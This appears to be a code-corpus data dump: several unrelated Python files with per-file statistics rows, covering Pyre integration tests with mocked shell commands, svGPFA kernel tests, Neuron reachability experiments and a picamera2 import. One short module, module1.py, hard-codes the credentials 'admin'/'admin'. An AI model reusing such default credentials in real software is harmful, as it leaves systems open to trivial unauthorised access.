"pyre profile --profile-output=total_shared_memory_size_over_time",
),
CommandInput(Path("old_root"), "pyre query save_server_state('tempfile')"),
CommandInput(Path("old_root"), "patch -p1", patch_content),
CommandInput(
Path("old_root"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive incremental"
),
CommandInput(Path("old_root"), "pyre stop "),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive check"
),
CommandInput(Path("old_root"), f"hg update --clean {initial_hash}"),
]
def always_clean_execute(command_input: CommandInput) -> CommandOutput:
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
def test_file(self) -> None:
handle_a = "foo/a.py"
content_a = "def bar() -> None: ..."
handle_b = "foo/b.py"
content_b = "def baz(x: int) -> int: ... "
handle_c, handle_d = "c.py", "derp/d.py"
changes = {handle_a: content_a, handle_b: content_b}
removals = [handle_c, handle_d]
specification = Specification.from_json(
{
"old_state": {
"kind": "hg",
"repository": "old_root",
"commit_hash": "old_hash",
},
"new_state": {"kind": "file", "changes": changes, "removals": removals},
}
)
initial_hash = "initial_hash"
expected_commands = [
CommandInput(Path("old_root"), "hg whereami"),
CommandInput(Path("old_root"), "hg update --clean old_hash"),
CommandInput(
Path("old_root"), "pyre --no-saved-state --enable-profiling restart"
),
CommandInput(
Path("old_root"), "pyre profile --profile-output=cold_start_phases"
),
CommandInput(
Path("old_root"),
"pyre profile --profile-output=total_shared_memory_size_over_time",
),
CommandInput(Path("old_root"), "pyre query save_server_state('tempfile')"),
CommandInput(Path("old_root"), "mkdir -p foo"),
CommandInput(Path("old_root"), f"tee {handle_a}", content_a),
CommandInput(Path("old_root"), "mkdir -p foo"),
CommandInput(Path("old_root"), f"tee {handle_b}", content_b),
CommandInput(Path("old_root"), f"rm -f {handle_c}"),
CommandInput(Path("old_root"), f"rm -f {handle_d}"),
CommandInput(
Path("old_root"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive incremental"
),
CommandInput(Path("old_root"), "pyre stop "),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive check"
),
CommandInput(Path("old_root"), f"hg update --clean {initial_hash}"),
]
# pyre-fixme[53]: Captured variable `initial_hash` is not annotated.
def always_clean_execute(command_input: CommandInput) -> CommandOutput:
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
def test_batch(self) -> None:
specification = Specification.from_json(
{
"old_state": {
"kind": "hg",
"repository": "old_root",
"commit_hash": "old_hash",
},
"new_state": {
"kind": "batch",
"updates": [
{"kind": "hg", "commit_hash": "new_hashA"},
{"kind": "hg", "commit_hash": "new_hashB"},
],
},
}
)
initial_hash: str = "initial_hash"
expected_commands = [
CommandInput(Path("old_root"), "hg whereami"),
CommandInput(Path("old_root"), "hg update --clean old_hash"),
CommandInput(
Path("old_root"), "pyre --no-saved-state --enable-profiling restart"
),
CommandInput(
Path("old_root"), "pyre profile --profile-output=cold_start_phases"
),
CommandInput(
Path("old_root"),
"pyre profile --profile-output=total_shared_memory_size_over_time",
),
CommandInput(Path("old_root"), "pyre query save_server_state('tempfile')"),
CommandInput(Path("old_root"), "hg update --clean new_hashA"),
CommandInput(
Path("old_root"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(Path("old_root"), "hg update --clean new_hashB"),
CommandInput(
Path("old_root"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive incremental"
),
CommandInput(Path("old_root"), "pyre stop "),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive check"
),
CommandInput(Path("old_root"), f"hg update --clean {initial_hash}"),
]
def always_clean_execute(command_input: CommandInput) -> CommandOutput:
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
def test_file_state(self) -> None:
handle_a = "foo/a.py"
content_a = "def bar() -> None: ..."
handle_b = "foo/b.py"
content_b = "def baz(x: int) -> int: ..."
specification = Specification.from_json(
{
"old_state": {
"kind": "file",
"files": {handle_a: content_a, handle_b: content_b},
},
"new_state": {"kind": "file", "removals": [handle_a]},
}
)
expected_commands = [
CommandInput(Path("."), "mktemp -d"),
CommandInput(Path("/mock/tmp"), "tee .watchmanconfig", "{}"),
CommandInput(
Path("/mock/tmp"),
"tee .pyre_configuration",
'{ "source_directories": [ "." ] }',
),
CommandInput(Path("/mock/tmp"), "mkdir -p foo"),
CommandInput(Path("/mock/tmp"), f"tee {handle_a}", content_a),
CommandInput(Path("/mock/tmp"), "mkdir -p foo"),
CommandInput(Path("/mock/tmp"), f"tee {handle_b}", content_b),
CommandInput(Path("/mock/tmp"), "watchman watch ."),
CommandInput(
Path("/mock/tmp"), "pyre --no-saved-state --enable-profiling restart"
),
CommandInput(
Path("/mock/tmp"), "pyre profile --profile-output=cold_start_phases"
),
CommandInput(
Path("/mock/tmp"),
"pyre profile --profile-output=total_shared_memory_size_over_time",
),
CommandInput(Path("/mock/tmp"), "pyre query save_server_state('tempfile')"),
CommandInput(Path("/mock/tmp"), f"rm -f {handle_a}"),
CommandInput(
Path("/mock/tmp"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(
Path("/mock/tmp"), "pyre --output=json --noninteractive incremental"
),
CommandInput(Path("/mock/tmp"), "pyre stop "),
CommandInput(
Path("/mock/tmp"), "pyre --output=json --noninteractive check"
),
CommandInput(Path("/mock/tmp"), "watchman watch-del ."),
CommandInput(Path("."), "rm -rf /mock/tmp"),
]
def always_clean_execute(command_input: CommandInput) -> CommandOutput:
if command_input.command.startswith("mktemp"):
return CommandOutput(return_code=0, stdout="/mock/tmp", stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
elif "watchman watch" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
def test_updated_state(self) -> None:
specification = Specification.from_json(
{
"old_state": {
"kind": "updated",
"base": {
"kind": "hg",
"repository": "old_root",
"commit_hash": "old_hash",
},
"updates": [
{"kind": "hg", "commit_hash": "new_hashA"},
{"kind": "hg", "commit_hash": "new_hashB"},
],
},
"new_state": {"kind": "hg", "commit_hash": "new_hashC"},
}
)
initial_hash: str = "initial_hash"
expected_commands = [
CommandInput(Path("old_root"), "hg whereami"),
CommandInput(Path("old_root"), "hg update --clean old_hash"),
CommandInput(Path("old_root"), "hg update --clean new_hashA"),
CommandInput(Path("old_root"), "hg update --clean new_hashB"),
CommandInput(
Path("old_root"), "pyre --no-saved-state --enable-profiling restart"
),
CommandInput(
Path("old_root"), "pyre profile --profile-output=cold_start_phases"
),
CommandInput(
Path("old_root"),
"pyre profile --profile-output=total_shared_memory_size_over_time",
),
CommandInput(Path("old_root"), "pyre query save_server_state('tempfile')"),
CommandInput(Path("old_root"), "hg update --clean new_hashC"),
CommandInput(
Path("old_root"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive incremental"
),
CommandInput(Path("old_root"), "pyre stop "),
CommandInput(
Path("old_root"), "pyre --output=json --noninteractive check"
),
CommandInput(Path("old_root"), f"hg update --clean {initial_hash}"),
]
def always_clean_execute(command_input: CommandInput) -> CommandOutput:
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
| 43.471893 | 88 | 0.545786 | 2,731 | 29,387 | 5.632003 | 0.08312 | 0.104024 | 0.100059 | 0.121123 | 0.837852 | 0.819453 | 0.813081 | 0.800403 | 0.773942 | 0.739809 | 0 | 0.006999 | 0.333889 | 29,387 | 675 | 89 | 43.536296 | 0.778748 | 0.008065 | 0 | 0.650238 | 0 | 0 | 0.242657 | 0.053665 | 0 | 0 | 0 | 0.001481 | 0.023847 | 1 | 0.027027 | false | 0 | 0.017488 | 0 | 0.128776 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e17068e1c0252b38d12be45d1733aae22de4c927 | 716 | py | Python | module1.py | Studioant22/AMS_OS | c694660aad89cea5ae09ae96a5e9bc008ba47f02 | [
"CC0-1.0"
] | 1 | 2021-11-10T15:58:49.000Z | 2021-11-10T15:58:49.000Z | module1.py | Studioant22/ams_os | c694660aad89cea5ae09ae96a5e9bc008ba47f02 | [
"CC0-1.0"
] | null | null | null | module1.py | Studioant22/ams_os | c694660aad89cea5ae09ae96a5e9bc008ba47f02 | [
"CC0-1.0"
] | null | null | null | User = "admin"
Password = "admin"
def credits():
print("""
e e e ,d88~~\ ,88~-_ ,d88~~\
d8b d8b d8b 8888 d888 \ 8888
/Y88b d888bdY88b `Y88b 88888 | `Y88b
/ Y88b / Y88Y Y888b `Y88b, 88888 | `Y88b,
/____Y88b / YY Y888b 8888 Y888 / 8888
/ Y88b / Y888b \__88P' `88_-~ \__88P'
------------------------------CREDITOS----------------------------
Autor:
Versión:
Contacto:
Licencia:
Idioma:
""") | 32.545455 | 71 | 0.298883 | 47 | 716 | 4.340426 | 0.553191 | 0.019608 | 0.127451 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.240122 | 0.540503 | 716 | 22 | 72 | 32.545455 | 0.379939 | 0 | 0 | 0 | 0 | 0 | 0.91523 | 0.094828 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.058824 | 0 | 0 | 0.058824 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
bee02103640a62d3e24118e992f3fe91924c78cc | 6,861 | py | Python | ci/test_svPosteriorOnLatents.py | gatsby-sahani/svGPFA | 9bf026c216cae83ba44ae6b4399c92c37d39a56c | [
"MIT"
] | null | null | null | ci/test_svPosteriorOnLatents.py | gatsby-sahani/svGPFA | 9bf026c216cae83ba44ae6b4399c92c37d39a56c | [
"MIT"
] | null | null | null | ci/test_svPosteriorOnLatents.py | gatsby-sahani/svGPFA | 9bf026c216cae83ba44ae6b4399c92c37d39a56c | [
"MIT"
] | 1 | 2020-04-20T12:20:35.000Z | 2020-04-20T12:20:35.000Z |
import sys
import pdb
import os
import math
from scipy.io import loadmat
import numpy as np
import torch
sys.path.append("../src")
from stats.kernels import PeriodicKernel, ExponentialQuadraticKernel
from stats.svGPFA.kernelMatricesStore import IndPointsLocsKMS, \
IndPointsLocsAndAllTimesKMS, IndPointsLocsAndAssocTimesKMS
from stats.svGPFA.svPosteriorOnIndPoints import SVPosteriorOnIndPoints
from stats.svGPFA.svPosteriorOnLatents import SVPosteriorOnLatentsAllTimes, \
SVPosteriorOnLatentsAssocTimes
def test_computeMeansAndVars_allTimes():
tol = 5e-6
dataFilename = os.path.join(os.path.dirname(__file__), "data/Estep_Objective_PointProcess_svGPFA.mat")
mat = loadmat(dataFilename)
nLatents = mat["Z"].shape[0]
nTrials = mat["Z"][0,0].shape[2]
qMu0 = [torch.from_numpy(mat["q_mu"][(0,i)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
qSVec0 = [torch.from_numpy(mat["q_sqrt"][(0,i)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
qSDiag0 = [torch.from_numpy(mat["q_diag"][(0,i)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
t = torch.from_numpy(mat["ttQuad"]).type(torch.DoubleTensor).permute(2, 0, 1)
Z0 = [torch.from_numpy(mat["Z"][(i,0)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
mu_k = torch.from_numpy(mat["mu_k_Quad"]).type(torch.DoubleTensor).permute(2,0,1)
var_k = torch.from_numpy(mat["var_k_Quad"]).type(torch.DoubleTensor).permute(2,0,1)
kernelNames = mat["kernelNames"]
hprs = mat["hprs"]
kernels = [[None] for k in range(nLatents)]
kernelsParams0 = [[None] for k in range(nLatents)]
for k in range(nLatents):
if np.char.equal(kernelNames[0,k][0], "PeriodicKernel"):
kernels[k] = PeriodicKernel(scale=1.0)
kernelsParams0[k] = torch.tensor([float(hprs[k,0][0]),
float(hprs[k,0][1])],
dtype=torch.double)
elif np.char.equal(kernelNames[0,k][0], "rbfKernel"):
kernels[k] = ExponentialQuadraticKernel(scale=1.0)
kernelsParams0[k] = torch.tensor([float(hprs[k,0][0])],
dtype=torch.double)
else:
raise ValueError("Invalid kernel name: %s"%(kernelNames[k]))
qU = SVPosteriorOnIndPoints()
indPointsLocsKMS = IndPointsLocsKMS()
indPointsLocsAndTimesKMS = IndPointsLocsAndAllTimesKMS()
qK = SVPosteriorOnLatentsAllTimes(svPosteriorOnIndPoints=qU,
indPointsLocsKMS=indPointsLocsKMS,
indPointsLocsAndTimesKMS=
indPointsLocsAndTimesKMS)
qUParams0 = {"qMu0": qMu0, "qSVec0": qSVec0, "qSDiag0": qSDiag0}
kmsParams0 = {"kernelsParams0": kernelsParams0,
"inducingPointsLocs0": Z0}
qU.setInitialParams(initialParams=qUParams0)
indPointsLocsKMS.setKernels(kernels=kernels)
indPointsLocsKMS.setInitialParams(initialParams=kmsParams0)
indPointsLocsKMS.buildKernelsMatrices()
indPointsLocsAndTimesKMS.setKernels(kernels=kernels)
indPointsLocsAndTimesKMS.setInitialParams(initialParams=kmsParams0)
indPointsLocsAndTimesKMS.setTimes(times=t)
indPointsLocsAndTimesKMS.buildKernelsMatrices()
qKMu, qKVar = qK.computeMeansAndVars()
qKMuError = math.sqrt(((mu_k-qKMu)**2).mean())
assert(qKMuError<tol)
qKVarError = math.sqrt(((var_k-qKVar)**2).mean())
assert(qKVarError<tol)
def test_computeMeansAndVars_assocTimes():
tol = 5e-6
dataFilename = os.path.join(os.path.dirname(__file__), "data/Estep_Objective_PointProcess_svGPFA.mat")
mat = loadmat(dataFilename)
nLatents = mat["Z"].shape[0]
nTrials = mat["Z"][0,0].shape[2]
qMu0 = [torch.from_numpy(mat["q_mu"][(0,i)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
qSVec0 = [torch.from_numpy(mat["q_sqrt"][(0,i)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
qSDiag0 = [torch.from_numpy(mat["q_diag"][(0,i)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
Z0 = [torch.from_numpy(mat["Z"][(i,0)]).type(torch.DoubleTensor).permute(2,0,1) for i in range(nLatents)]
Y = [torch.from_numpy(mat["Y"][tr,0]).type(torch.DoubleTensor) for tr in range(nTrials)]
mu_k = [torch.from_numpy(mat["mu_k_Spikes"][0,tr]).type(torch.DoubleTensor) for tr in range(nTrials)]
var_k = [torch.from_numpy(mat["var_k_Spikes"][0,tr]).type(torch.DoubleTensor) for tr in range(nTrials)]
kernelNames = mat["kernelNames"]
hprs = mat["hprs"]
kernels = [[None] for k in range(nLatents)]
kernelsParams0 = [[None] for k in range(nLatents)]
for k in range(nLatents):
if np.char.equal(kernelNames[0,k][0], "PeriodicKernel"):
kernels[k] = PeriodicKernel(scale=1.0)
kernelsParams0[k] = torch.tensor([float(hprs[k,0][0]),
float(hprs[k,0][1])],
dtype=torch.double)
elif np.char.equal(kernelNames[0,k][0], "rbfKernel"):
kernels[k] = ExponentialQuadraticKernel(scale=1.0)
kernelsParams0[k] = torch.tensor([float(hprs[k,0][0])],
dtype=torch.double)
else:
raise ValueError("Invalid kernel name: %s"%(kernelNames[k]))
qU = SVPosteriorOnIndPoints()
indPointsLocsKMS = IndPointsLocsKMS()
indPointsLocsAndTimesKMS = IndPointsLocsAndAssocTimesKMS()
qK = SVPosteriorOnLatentsAssocTimes(svPosteriorOnIndPoints=qU,
indPointsLocsKMS=indPointsLocsKMS,
indPointsLocsAndTimesKMS=
indPointsLocsAndTimesKMS)
quParams0 = {"qMu0": qMu0, "qSVec0": qSVec0, "qSDiag0": qSDiag0}
kmsParams0 = {"kernelsParams0": kernelsParams0,
"inducingPointsLocs0": Z0}
qU.setInitialParams(initialParams=quParams0)
indPointsLocsKMS.setKernels(kernels=kernels)
indPointsLocsKMS.setInitialParams(initialParams=kmsParams0)
indPointsLocsKMS.buildKernelsMatrices()
indPointsLocsAndTimesKMS.setKernels(kernels=kernels)
indPointsLocsAndTimesKMS.setInitialParams(initialParams=kmsParams0)
indPointsLocsAndTimesKMS.setTimes(times=Y)
indPointsLocsAndTimesKMS.buildKernelsMatrices()
qKMu, qKVar = qK.computeMeansAndVars()
for tr in range(nTrials):
qKMuError = math.sqrt(((mu_k[tr]-qKMu[tr])**2).mean())
assert(qKMuError<tol)
qKVarError = math.sqrt(((var_k[tr]-qKVar[tr])**2).mean())
assert(qKVarError<tol)
if __name__=="__main__":
test_computeMeansAndVars_allTimes()
test_computeMeansAndVars_assocTimes()
| 47.645833 | 119 | 0.658213 | 751 | 6,861 | 5.925433 | 0.154461 | 0.028315 | 0.044045 | 0.053483 | 0.825618 | 0.801573 | 0.768315 | 0.761348 | 0.731685 | 0.715506 | 0 | 0.024341 | 0.20959 | 6,861 | 143 | 120 | 47.979021 | 0.796238 | 0 | 0 | 0.672131 | 0 | 0 | 0.059913 | 0.012828 | 0 | 0 | 0 | 0 | 0.032787 | 1 | 0.016393 | false | 0 | 0.090164 | 0 | 0.106557 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
83173514d79fcf74dc4772c8eac41b0f5f551fb4 | 7,718 | py | Python | examples/test_neuron.py | Tarheel-Formal-Methods/kaa-optimize | 35fe7b580df3b5efe7de9314b821c257f68d74bf | [
"MIT"
] | null | null | null | examples/test_neuron.py | Tarheel-Formal-Methods/kaa-optimize | 35fe7b580df3b5efe7de9314b821c257f68d74bf | [
"MIT"
] | 2 | 2020-12-11T17:34:46.000Z | 2020-12-11T21:43:13.000Z | examples/test_neuron.py | Tarheel-Formal-Methods/kaa-optimize | 35fe7b580df3b5efe7de9314b821c257f68d74bf | [
"MIT"
] | 1 | 2020-12-11T17:31:16.000Z | 2020-12-11T17:31:16.000Z | from models.neuron import Neuron_UnitBox, Neuron
from kaa.experi_init import *
from kaa.timer import Timer
def test_sapo_Neuron():
num_steps = 500
model = Neuron()
experi_input = dict(model=model,
strat=None,
label=f"Neuron Box Reachable Set",
num_steps=num_steps)
experi = PhasePlotExperiment(experi_input)
experi.execute(0, 1, plot_border_traj=False)
Timer.generate_stats()
def test_OFO_vs_AFO_phase_plot_Neuron():
use_supp = True
use_pregen = False
num_trajs = 5000
num_steps = 200
model = Neuron_UnitBox()
pca_window_size = 18
lin_window_size = 2
pca_strat = SlidingPCAStrat(model, lifespan=pca_window_size)
lin_strat = SlidingLinStrat(model, lifespan=lin_window_size)
experi_input_afo = dict(model=model,
strat=MultiStrategy(pca_strat, lin_strat),
label=f"Neuron AFO SlidingPCA Step {pca_window_size} and SlidingLin Step {lin_window_size}",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps,
trans_mode=BundleTransMode.AFO)
experi_input_ofo = dict(model=model,
strat=MultiStrategy(pca_strat, lin_strat),
label=f"Neuron OFO SlidingPCA Step {pca_window_size} and SlidingLin Step {lin_window_size}",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps,
trans_mode=BundleTransMode.OFO)
if use_supp:
file_identifier = "(SUPP)"
elif use_pregen:
file_identifier = f"(PREGEN: {num_trajs})"
else:
file_identifier = "(RAND)"
experi = PhasePlotExperiment(experi_input_afo, experi_input_ofo)
experi.execute(0,1)
Timer.generate_stats()
def test_sliding_phase_plot_Neuron():
use_supp = True
use_pregen = False
num_trajs = 5000
num_steps = 500
model = Neuron_UnitBox(delta=0.08)
pca_window_size = 4
lin_window_size = 1
pca_strat = SlidingPCAStrat(model, lifespan=pca_window_size)
lin_strat = SlidingLinStrat(model, lifespan=lin_window_size)
experi_input = dict(model=model,
strat=MultiStrategy(pca_strat, lin_strat),
label=f"SlidingPCA Step {pca_window_size} and SlidingLin Step {lin_window_size}",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps)
if use_supp:
file_identifier = "(SUPP)"
elif use_pregen:
file_identifier = f"(PREGEN: {num_trajs})"
else:
file_identifier = "(RAND)"
experi = PhasePlotExperiment(experi_input)
experi.execute(0, 1, plot_border_traj=False)
Timer.generate_stats()
def test_init_reach_vol_vs_ran_Neuron():
num_steps = 200
use_supp = True
use_pregen = False
num_trajs = 5000
pca_window_size = 18
lin_window_size = 2
inputs = []
for inc in range(5):
inc /= 500
box = ((0.9-inc,1.1), (2.4-inc,2.6))
unit_model = Neuron_UnitBox(init_box=box)
model = Neuron(init_box=box)
pca_strat = SlidingPCAStrat(unit_model, lifespan=pca_window_size)
lin_strat = SlidingLinStrat(unit_model, lifespan=lin_window_size)
experi_input_one = dict(model=unit_model,
strat=MultiStrategy(pca_strat, lin_strat),
label=f"Neuron SlidingPCA Step {pca_window_size} and SlidingLin Step {lin_window_size}",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps)
inputs.append(experi_input_one)
if use_supp:
file_identifier = "(SUPP)"
elif use_pregen:
file_identifier = f"(PREGEN: {num_trajs})"
else:
file_identifier = "(RAND)"
experi = InitReachVSRandomPlotExperiment(*inputs, num_ran_temps=pca_window_size+lin_window_size, num_trials=3)
experi.execute()
def test_init_reach_vol_Neuron():
num_steps = 200
use_supp = True
use_pregen = False
num_trajs = 5000
pca_window_size = 4
lin_window_size = 1
inputs_one = []
inputs_two = []
for inc in range(5):
inc /= 500
box = ((0.9-inc,1.1), (2.4-inc,2.6))
unit_model = Neuron_UnitBox(init_box=box)
model = Neuron(init_box=box)
pca_strat = SlidingPCAStrat(unit_model, lifespan=pca_window_size)
lin_strat = SlidingLinStrat(unit_model, lifespan=lin_window_size)
experi_input_one = dict(model=unit_model,
strat=MultiStrategy(pca_strat, lin_strat),
label=f"Neuron PCA WinSize {pca_window_size} and Lin WinSize {lin_window_size}",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps)
experi_input_two = dict(model=model,
strat=None,
label=f"SapoNeuron",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps)
inputs_one.append(experi_input_one)
inputs_two.append(experi_input_two)
inputs = inputs_one + inputs_two
if use_supp:
file_identifier = "(SUPP)"
elif use_pregen:
file_identifier = f"(PREGEN: {num_trajs})"
else:
file_identifier = "(RAND)"
experi = InitReachPlotExperiment(*inputs)
experi.execute()
def test_pca_dominant_Neuron():
num_steps = 500
model = Neuron_UnitBox()
use_supp = True
use_pregen = False
num_trajs = 5000
pca_strat = SlidingPCAStrat(model, lifespan=15)
lin_strat = SlidingLinStrat(model, lifespan=5)
experi_input = dict(model=model,
strat=MultiStrategy(pca_strat, lin_strat),
label=f"SlidingPCA Size 15, SlidingLin Size 5",
supp_mode = use_supp,
pregen_mode = use_pregen,
num_trajs=num_trajs,
num_steps=num_steps-1,
max_steps=num_steps)
if use_supp:
file_identifier = "(SUPP)"
elif use_pregen:
file_identifier = f"(PREGEN: {num_trajs})"
else:
file_identifier = "(RAND)"
experi = PhasePlotExperiment(experi_input)
experi.execute(0, 1, plot_border_traj=True)
Timer.generate_stats()
def test_ran_strat_Neuron():
model = Neuron_UnitBox()
test_ran_strat(model, 500, 5000, use_supp=True, use_pregen=False)
def test_skewed_sliding_strat_comb_Neuron():
unit_model = Neuron_UnitBox()
model = Neuron()
test_skewed_sliding_strat_comb(model, 200, 5000, num_temps=5, incre=1, use_supp=True, use_pregen=False, use_sapo=model)
def test_sliding_pca_Neuron():
model = Neuron_UnitBox()
test_sliding_pca(model, 20, 500, 5000, use_supp=True, use_pregen=False)
def test_sliding_lin_Neuron():
model = Neuron_UnitBox()
test_sliding_lin(model, 20, 500, 5000, use_supp=True, use_pregen=False)
| 31.892562 | 123 | 0.595232 | 908 | 7,718 | 4.70815 | 0.112335 | 0.065497 | 0.042573 | 0.029474 | 0.830643 | 0.772632 | 0.728187 | 0.71462 | 0.694035 | 0.694035 | 0 | 0.023983 | 0.324696 | 7,718 | 241 | 124 | 32.024896 | 0.796239 | 0 | 0 | 0.73913 | 0 | 0 | 0.080202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054348 | false | 0 | 0.016304 | 0 | 0.070652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8351c8e7a1d0b49bf949442af575c45da3e8d2bf | 48 | py | Python | picamera2/utils/__init__.py | IanTBlack/picamera2 | 4d31a56cdb0d8360e71927e754fc6bef50bec360 | [
"BSD-2-Clause"
] | 71 | 2022-02-15T14:24:34.000Z | 2022-03-29T16:36:46.000Z | picamera2/utils/__init__.py | IanTBlack/picamera2 | 4d31a56cdb0d8360e71927e754fc6bef50bec360 | [
"BSD-2-Clause"
] | 37 | 2022-02-16T12:35:45.000Z | 2022-03-31T13:18:42.000Z | picamera2/utils/__init__.py | IanTBlack/picamera2 | 4d31a56cdb0d8360e71927e754fc6bef50bec360 | [
"BSD-2-Clause"
] | 15 | 2022-02-16T12:12:57.000Z | 2022-03-31T15:17:58.000Z | from .picamera2_logger import initialize_logger
| 24 | 47 | 0.895833 | 6 | 48 | 6.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.083333 | 48 | 1 | 48 | 48 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8368150649144c6c7f9a1d02ab27f86d8635a05a | 4,307 | py | Python | tests/validate/test_inquiry.py | hbruch/frictionless-py | 0f97d33c8fea7ef60cf8458b72eb0f54f4649798 | [
"MIT"
] | null | null | null | tests/validate/test_inquiry.py | hbruch/frictionless-py | 0f97d33c8fea7ef60cf8458b72eb0f54f4649798 | [
"MIT"
] | null | null | null | tests/validate/test_inquiry.py | hbruch/frictionless-py | 0f97d33c8fea7ef60cf8458b72eb0f54f4649798 | [
"MIT"
] | null | null | null | import pytest
from frictionless import validate
# General
def test_validate_inquiry():
